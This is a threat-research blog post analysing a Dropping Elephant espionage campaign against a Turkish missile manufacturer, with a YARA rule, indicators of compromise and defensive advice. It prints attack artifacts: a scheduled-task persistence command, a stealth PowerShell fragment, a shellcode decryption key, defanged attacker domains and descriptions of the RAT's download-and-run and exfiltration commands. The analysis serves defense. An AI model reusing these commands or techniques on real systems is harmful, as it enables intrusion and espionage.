Dropping Elephant APT Group Targets Turkish Defense Industry With New Campaign and Capabilities: LOLBAS, VLC Player, and Encrypted Shellcode

Executive Summary

The Arctic Wolf® Labs team has identified a new campaign by cyber-espionage group Dropping Elephant targeting Turkish defense contractors, specifically a manufacturer of precision-guided missile systems. The campaign employs a five-stage execution chain delivered via malicious LNK files disguised as conference invitations sent to targets interested in learning more about unmanned vehicle systems.

The attack leverages legitimate binaries (VLC Media Player and Microsoft Task Scheduler) for defense evasion through DLL side-loading techniques. This represents a significant evolution of this threat actor’s capabilities, transitioning from the x64 DLL variants observed in November 2024, to the current x86 PE executables with enhanced command structures.

The campaign’s timing appears to coincide with heightened Türkiye*-Pakistan defense cooperation and recent India-Pakistan military tensions, suggesting the targeting may be geopolitically motivated. Infrastructure analysis reveals deliberate operational security measures, including the impersonation of legitimate websites for command-and-control (C2) infrastructure.

The campaign demonstrates how threat actors combine social engineering with precisely crafted lures to gather strategic intelligence from their targets. In this blog, we’ll break down the attack step-by-step to show how this is achieved, as well as discussing proactive steps organizations can take to defend themselves against this type of attack.

* The Republic of Turkey changed its official name to The Republic of Türkiye on 26 May 2022.

Key Intelligence Findings:

Threat Attribution and Evolution

• Threat Actor: Dropping Elephant (aka Patchwork or Quilted Tiger).
• Technical Evolution: Diversification from x64 DLL to x86 PE architecture, with reduced library dependencies.
• Campaign Scope: Multi-country targeting in prior campaigns, with Türkiye-specific operational focus in this specific campaign.

Attack Methodology

• Initial Access: Spear-phishing, with conference-themed LNK files.
• Execution: Five-component PowerShell-based download chain from malicious domain expouav[.]org.
• Defense Evasion: VLC DLL side-loading, file extension manipulation, scheduled task persistence.
• Command Structure: Enhanced C2 protocol, using C-standard library’s strtok() for parsing and CreateThread execution.

Target Profile

• Primary Target: A Turkish precision-guided systems manufacturer.
• Sector: Defense industrial base, specifically missile and rocket systems.
• Geopolitical Context: Türkiye’s military cooperation with Pakistan amid regional tensions.

Infrastructure Assessment

• Delivery: expouav[.]org (created 2025-06-25). This malicious domain mimics the legitimate conference website waset.org.
• C2: roseserve[.]org (registered 2025-06-23). This malicious site impersonates the Pardus project, a Linux distribution project developed with support from the government of Türkiye.
• Hosting: DEDIPATH-LLC/STARK-INDUSTRIES (U.S./GB hosting for Türkiye-focused operations).
• PTR records points to tk99671283030[.]avanetco[.]com (Created on 2025-06-27 over 2.56.127[.]187). Avanetco is a virtual private server (VPS) reseller headquartered in Iran.
• Operational timeline: Infrastructure preparation began in June 2025 and has been in active operation since July 2025.

Introducing Dropping Elephant

Dropping Elephant (also known as Patchwork or Quilted Tiger) is a relatively new advanced persistent threat (APT) group suspected to be of Indian origin. First identified in December 2015, the group has been observed using social engineering techniques, including spear-phishing and watering hole attacks, which involve compromising or impersonating legitimate websites known to be frequented by the groups’ targets.

It has also been known to exploit malware distribution vulnerabilities, and has used fake downloadable apps to drop malware such as VajraSpy, an Android-targeted remote access trojan (RAT), and BADNEWS RAT.

Based on campaign analysis, Dropping Elephant’s primary motivation is most likely espionage. Initially targeting South and Southeast Asia, the group has since expanded its sights to include victims worldwide, including Europe and the United States. It uses a range of custom tooling and techniques for intelligence-gathering, particularly focusing on individuals, organizations and sectors with diplomatic and economic ties to China.

The industry sectors most highly targeted by this APT group to date include Defense, Energy, Financial, Government, IT, Aviation, NGOs, Think Tanks, and Pharmaceutical.

Attack Chain Breakdown

1. The Conference Invitation

The threat actor kicks off the attack by delivering a malicious LNK file to the intended targets:

Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk

– an opportunity for defense industry professionals working on drone and missile technologies to attend a conference. The technical details of this file are shown in the table below.

Figure 1: Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk structure.

Upon execution, the lnk file invokes PowerShell, which in turn reaches out via Wget to a Cloudflare-protected hosting site – expouav[.]org – and retrieves several files.

Pester.bat is a Windows batch file that is part of the PowerShell Pester testing framework. It’s classified as a Living Off the Land Binary and Script (LOLBAS) due to its potential for abuse by threat actors. In this campaign, extra quotation marks are inserted into the commands by the threat actor to evade common string-matching detections for potentially suspicious commands.

As part of the process of establishing persistence, a scheduled task is created which abuses VLC, the popular legitimate media player software, to side-load malicious DLL files. VLC Media Player’s popularity springs a trap on the unwitting targets, playing on the user’s trust in familiar software to help advance the threat actor’s attack chain.

2. Silent Execution

The PowerShell code is executed in a manner which enables it to bypass restrictions (should they be enabled) as well as hide any progress indicators of its functionality from the user, to remain stealthy during execution.

"sleep 1;$ProgressPreference = 'SilentlyContinue'"

3. Downloads Multiple Files from expouav[.]org

The expouav[.]org domain referenced within the LNK file was registered on 06/25/2025. It hosts a PDF lure mimicking https://waset.org/unmanned-vehicle-systems-conference-in-july-2025-in-istanbul (a legitimate website). The real conference name is “ICUVS 2025: 19. International Conference on Unmanned Vehicle Systems”, and it takes place on July 28^th and 29^th, 2025 in Istanbul, Türkiye.

Figure 2: Legitimate waset.org website with the same conference information used by the fake PDF-based replica.

Assets used in the PDF lure were copied from the official website. The copy is nearly identical and even includes the original conference code.

The PDF document serves as a visual decoy, designed to distract the user while the rest of the execution chain runs silently in the background.

Figure 3: Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf PDF lure content.

This targeting occurs as Türkiye commands 65% of the global UAV export market and develops critical hypersonic missile capabilities, while simultaneously strengthening defense ties with Pakistan during a period of heightened India-Pakistan tensions.

It specifically reflects the strategic value of technologies and intelligence services to understand Türkiye and possibly NATO capabilities. Access to NATO-standard defense technologies and interoperability protocols provides insights into Western military capabilities and strategic planning.

4. File Evasion Technique

The simultaneous download of five distinct files represents a carefully orchestrated operation. Each component serves a specific purpose.

Files are dropped to the user’s Tasks folder, with additional characters in the extension to bypass detection by security systems. Once the file is saved to disk, the command automatically removes the extra characters, leaving the file with an executable extension, ready to run.

Detailed Technical Analysis

The first stage of the execution of Dropping Elephant’s attack chain is a .LNK file that contains PowerShell code. This script loads five files sequentially:

1. Visual Lure for Distraction

File: Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf
SHA-256: 588021b5553838fae5498de40172d045b5168c8e608b8929a7309fd08abfaa93

2. Legitimate VLC Video Player File

VLC Video Player is a free and open-source cross-platform multimedia player from VideoLAN, a non-profit organization. The player itself is legitimate, but (as with many digital tools) can be abused by cybercriminals.

Original downloaded name: “lama” → renamed to C:\Windows\Tasks\vlc.exe

SHA-256: 4cc729b554326ccc62205d46b95353dcb34cadf095b904e941814e902e0925b2

Figure 4: Legitimate VLC.exe file information.

3. Malicious DLL Library

Original file name: “lake” → renamed to libvlc.dll
Purpose: This library is responsible for running and decoding the shellcode.

SHA-256: 2cd2a4f1fc7e4b621b29d41e42789c1365e5689b4e3e8686b80f80268e2c0d8d

Project file name: newdll.dll
Compilation date: 2025-06-26 08:54:47

4. Legitimate Microsoft Task Scheduler

Original downloaded name: “dalai” → renamed to C:\Windows\Tasks\Winver.exe
Description: Legitimate Microsoft Task Scheduler file

SHA-256: 013c013e0efd13c9380fad58418b7aca8356e591a5cceffdb910f7d8b0ad28ef

Figure 5: Legitimate schtask.exe (Microsoft Task Scheduler).

5. Encrypted Shellcode

File: vlc.log
Location: C:\Windows\Tasks\vlc.log

SHA-256: 89ec9f19958a442e9e3dd5c96562c61229132f3acb539a6b919c15830f403553

Figure 6: Encrypted shellcode.

Execution Process

The following command creates a scheduled task using PowerShell and a pre-loaded legitimate Schtasks.exe Microsoft file:

PowerShell scheduled task:

saps "C:\Windows\Tasks\Winver" -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "C:\Windows\Tasks\vlc", '/f';

This scheduled task executes a legitimate VLC Player file which runs a DLL. The DLL acts as a shellcode loader that decrypts the ciphertext shellcode stored in vlc.log. The payload is launched in the VLC Player memory address space.

Shellcode Decryption

Decryption key: “76bhu93FGRjZX5hj876bhu93FGRjX5”

Figure 7: Shellcode decryption code.

Once decrypted, the shellcode becomes the final payload:

Figure 8: Decrypted shellcode header.

Digital Reconnaissance

Once executed in the system, the malware performs a series of actions that facilitate profiling of the infected device:

• Creates mutex ghjghkj to prevent multiple instances from running at once.
• Gathers victim’s computer name via GetComputerNameW.
• Collects username via GetUserNameW.
• Retrieves system firmware information.
• Checks processor features and capabilities for sandboxing evasion.
• Performs system time and performance counter queries.
• Takes screenshots of the screen and saves them as JPGs for C2 upload. This technique can be particularly useful when the targeted users work in a remote environment, where the sought-after data is stored not on the infected endpoint, but on a remote server. Screen-capturing is therefore vital to capture sensitive data, such as diagrams or classified projects stored on a clean remote server.

Figure 9: Screenshot-capture command.

Network Communication

To assess outside network connectivity, several external sites are queried.

External Services Contact:

• com/raw is used to determine external IP address
• iplocation.net/?cmd=ip-country is used for geolocation
• co is used for additional IP information
• Mozilla/5.0 user-agent is used to blend with legitimate traffic

Command and Control:

C2 Server: roseserve[.]org

Figure 10: The threat actor’s C2 server.

Reporting to C2 is based on the /post action, with structured parameters.

Figure 11: /post action via YcKOjLMxiwCZfSS//comrCVPEffFiPvF.php to C2.

Dropping Elephants’ RAT: Version Comparison Analysis

When comparing code between older versions of Dropping Elephants’ RAT from November 2024 and newer versions, we observed several key differences:

Architecture Change

• New version: x86 EXE executable
• Old versions: x64 DLL

Referential Samples:

November 2024 version: 01a635a11a140aef906efe9db22fb66b0d6510e1e702870c4c728099fd5ab455

Version targeting Türkiye: 8b6acc087e403b913254dd7d99f09136dc54fa45cf3029a8566151120d34d1c2

Code Optimization

Another interesting difference is that the threat group has begun using fewer library functions. For example, C2 command parsing in the new version is done with raw code, while the old version used the “C function” – memcmp, a function in C and C++ used to compare the contents of two memory blocks.

Command Processing

After receiving C2 commands, the code next compares them with a command list. Then, using CreateThread, it transfers execution to the appropriate code thread. Any string received by the server is split into tokens using the strtok function with ‘$’ delimiters.

Figure 12: Splitting into tokens with ‘$’ delimiter.

Network Infrastructure Analysis

roseserve[.]org serves as the malicious C2 for the attack we observed on Türkiye.

Infrastructure Details:

• PTR DNS record: tk99671283030.avanetco.com (avanetco.com is a legitimate commercial web hosting provider headquartered in Iran).
• Title response: “Pardus – TÜBİTAK”
• Redirect: Clicking “Turkish language” takes you to https://pardus.org.tr/en/ (a legitimate website with a very similar design). This choice demonstrates cultural and technical knowledge of the technology landscape in Türkiye, and the country’s technological independence.

Figure 13: Fake website hosted on rosereserve[.]org, mimicking the legitimate Pardus website.

Timeline:

• June 12-18, 2025: Threat actor prepares and configures 2.56.127[.]187.
• June 23, 2025: roseserve[.]org domain is purchased.
• June 29, 2025: Historical snapshot shows an impersonation of the Anadolu Agency (a news agency headquartered in Türkiye) website – see Figure 14, below.

Figure 14: An early attempt at impersonating a real news agency’s website on rosereserve[.]org.

Hosting Information:

The C2 server roseserve[.]org runs on 2.56.127[.]187.

• Owner: DEDIPATH-LLC
• ASN: AS 35913
• Country: U.S.
• CIDRs: 2[.]56.127.0/24

Secondary owner: STARK-INDUSTRIES

• ASN: AS 44477
• Country: GB
• CIDRs: 2[.]56.127.0/24

Website Comparison:

Hunting pivot for fake Pardus banner: \n\t\tPardus – TÜBİTAK\t

Original header: “Home – Pardus – TÜBİTAK” (TÜBİTAK is the Scientific and Technological Research Council of Türkiye, the developer of the Pardus operating system).

Original/legitimate pardus.org.tr: Points to real domain on IP address 193.140.63.90 (Türkiye).

Figure 15: Legitimate Pardus website.

Figure 16: Network infrastructure and implant deployment timeline (Click to enlarge). 

Remote Control Arsenal:

The code receives data in this order: C2 command + arguments.

Available Commands:

• 3Up3 – Downloads a file from a remote server, adds the .exe extension to it, and runs it. The URL is passed to this function as a parameter. This command transforms victim workstations into staging platforms for additional malware deployment, enabling the threat actor to adapt their tools based on discovered network data and security measures.
• 3gnfm9 – Unknown function.
• 3gjdfghj6 – Executes threat actor commands via cmd.exe and reports results to C2. It provides direct system access, enabling the threat actor to operate with the same privileges as a legitimate employee.
• 3ngjfng5 – Uploads stolen data to C2.
• 3CRT3 – Unknown function.
• 3APC3 – Shellcode loader command: Receives filename and process startup string. The process is launched via cmd, with the code injecting data from the file into the running process. Essentially, this is a shellcode loader command. The process can be any process, and the file can be any file, but it must already exist in the system. They most likely deploy it to the victim using other commands. In this context, the C2 code launches QueueUserAPC for asynchronous thread execution.
• 3SC3 – Screenshot command: Takes a screenshot and sends it to the server. (“SC” in this command is likely an abbreviation for Screenshot)

Victimology

The target of the campaign analyzed in this report is Türkiye, which Dropping Elephant most likely seeks to undermine via their cyber-espionage campaign against a major Turkish defense contractor and weapons manufacturer headquartered in the country. The company specializes in space systems, air defense systems, land systems, Naval systems, missile systems, ballistic systems, and subsystems.

How Arctic Wolf Protects Its Customers

Arctic Wolf is committed to ending cyber risk, and when active campaigns are identified, we move quickly to protect our customers.

Arctic Wolf Labs has leveraged threat intelligence around Dropping Elephants’ activity to implement new detections in the Arctic Wolf® Aurora™ Platform to protect customers. As we discover new information, we will enhance our detections to account for additional IOCs and techniques leveraged by this threat group.

Conclusion

The campaign analyzed in this blog exhibits highly strategic victim selection focused on Türkiye’s defense industrial base, specifically precision-guided weapons manufacturing capabilities. The timing of this targeted campaign aligns with Turkish military cooperation agreements with Pakistan, indicating the threat actor’s awareness of geopolitical developments and the opportunity to strategically exploit them through social engineering techniques.

Dropping Elephant demonstrates continued operational investment and development through architectural diversification from x64 DLL to x86 PE formats, and enhanced C2 protocol implementation through impersonation of legitimate websites.

The reduction in library dependencies and adoption of strtok-based command parsing indicates deliberate operational security improvements and codebase optimization by the group. The five-stage execution chain employs established living-off-the-land binaries and scripts (LOLBAS) techniques, with VLC DLL side-loading representing the primary evasion mechanism.

The two-month preparation timeline from domain registration (June 2025) to active operations (July 2025) suggests careful campaign execution planned well in advance of the July 28 – 29 Unmanned Aerial Vehicle conference in Istanbul, Türkiye, rather than ad-hoc or indiscriminate targeting.

Recommendations

As with many historical Dropping Elephant campaigns, the group leverages social engineering and spear phishing emails to obtain initial access into victim environments. The group relies heavily on user interaction in their campaigns. Significant effort is put into creating convincing lures and enticing emails that victims are more likely to interact with; in this case, centered around the upcoming conference about UAVs in Istanbul, Türkiye.

Social engineering and phishing emails are not completely remediated with security controls. However, educating users about the risks of interacting with unsolicited emails, particularly if the emails originate from outside their organization or call for urgent action, is a good start. Adding a “report phishing” button to your organization’s email solution can empower users to report suspected phishing emails to your Security Operations Center (SOC) or IT security team.

User education, such as general security awareness training, is one of the important elements in preventing Dropping Elephant and other groups from obtaining access to your organization. Ensure all employees are aware of good security hygiene practices. Fostering a culture where employees feel safe reporting suspected phishing attempts or potential security breaches can greatly increase your organization’s chances of preventing a successful compromise.

For those without the time to devote to creating security training resources from scratch, the Arctic Wolf Managed Security Awareness® training solution delivers easily digestible security lessons for employees, including regular phishing simulations and a “Report Phish” button, along with many other features.

Dropping Elephant’s primary motivation is espionage, focusing on obtaining long-term access to sensitive business and military information. Recognizing this, network segmentation, or isolating sensitive information, can help reduce your attack surface. Network segmentation limits where a threat actor can move through your environment and confines them to patient zero.

Also ensure your organization enforces the Principle of Least Privilege, both at the user level as well as the network level, to prevent threat groups from obtaining additional access if compromised.

Some additional methods you might consider include:

• Patch Often, Update Always: The entire attack surface of an organization is fair game for a sophisticated threat actor, from the gateways and endpoints to the networks and servers. Organizations should make sure to keep applications and operating systems regularly updated, and consider employing virtual patching for legacy systems.
• Put Proactive Defenses in Place: Intrusion prevention and detection systems have their place among firewalls and sandboxes to prevent attackers from exploiting security gaps. Endpoint Detection and Response (EDR) platforms can uncover hidden red flags before it’s too late, so consider implementing enterprise solutions such as Arctic Wolf® Aurora™ Endpoint Defense.
• Enforce “Least Privilege” Principles: Lock down tools or block the use of tools normally reserved for system administrators. Behavior monitoring and application control can block unusual or suspicious routines executed by suspicious files.
• Consider the use of Secure Email Gateway solutions, to help proactively filter out malicious emails.
• By leveraging the Windows Defender Application Control in Microsoft Windows, organizations can assess which tools, software and applications are used within their digital environments. Locking down or continually reassessing such lists may reduce the likelihood of threat actors leveraging Living-off-the-Land (LOTL) binaries within their environment.
• Staffing a Security Operations Center to protect your company is a costly endeavor, and may not be feasible for many organizations. Arctic Wolf® Managed Detection and Response (MDR) provides 24×7 monitoring of your networks, endpoints, and cloud environments to detect, respond to, and remediate modern cyberattacks.
• Finally, consider leveraging contextual cyber threat intelligence (CTI) to build an organizational risk profile and maintain updated threat models based on the geolocation, business profile and vertical your organization operates in. Such an intelligence program can help organizations to anticipate attacks and prioritize defenses based on the knowledge of the adversary and their tradecraft.

Appendix

YARA Hunting and Detection Rule

rule Dropping_Elephant_RAT {
    meta:
        description = "Rule for detecting Dropping Elephant RAT"
        last_modified = "2025-07-16"
        author = "The Arctic Wolf Labs team"
        version = "1.0"
        sha256 = "8b6acc087e403b913254dd7d99f09136dc54fa45cf3029a8566151120d34d1c2"
    strings:
        $a1 = "%s=33up$!!$%s$!!$%s" ascii wide
        $a2 = "%s=uep$@$%s$@$%s" ascii wide
        $a3 = "%s=%s$!!$%s" ascii wide
        $a4 = "%s=%s$!!$%s$!!$%s" ascii wide
        $a5 = "%s=%s!$$$!%s" ascii wide
        $a6 = "%s=%s!@!%s!@!%lu" ascii wide
        $a7 = "%s=%s!$$$!%s!$$$!%s" ascii wide
        $a8 = "%s=error@$$@%s@$$@%s" ascii wide
        $a9 = "%s=%s$!!$%s$!!$%s$!!$%s$!!$%s$!!$%s$!!$" ascii wide
    condition:
        (uint16(0) == 0x5A4D) and (filesize < 1MB) and (all of ($a*))
}

Indicators of Compromise (IOCs)

File Indicators

Scheduled Task

saps "C:\Windows\Tasks\Winver" -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "C:\Windows\Tasks\vlc", '/f';

Network Indicators

• expouav[.]org – Dropping website
• roseserve[.]org – C2 server

Mutant Object

Sessions\1\BaseNamedObjects\ghjghkj

Detailed MITRE ATT&CK® Mapping

About Arctic Wolf Labs

Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence and machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings.

Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.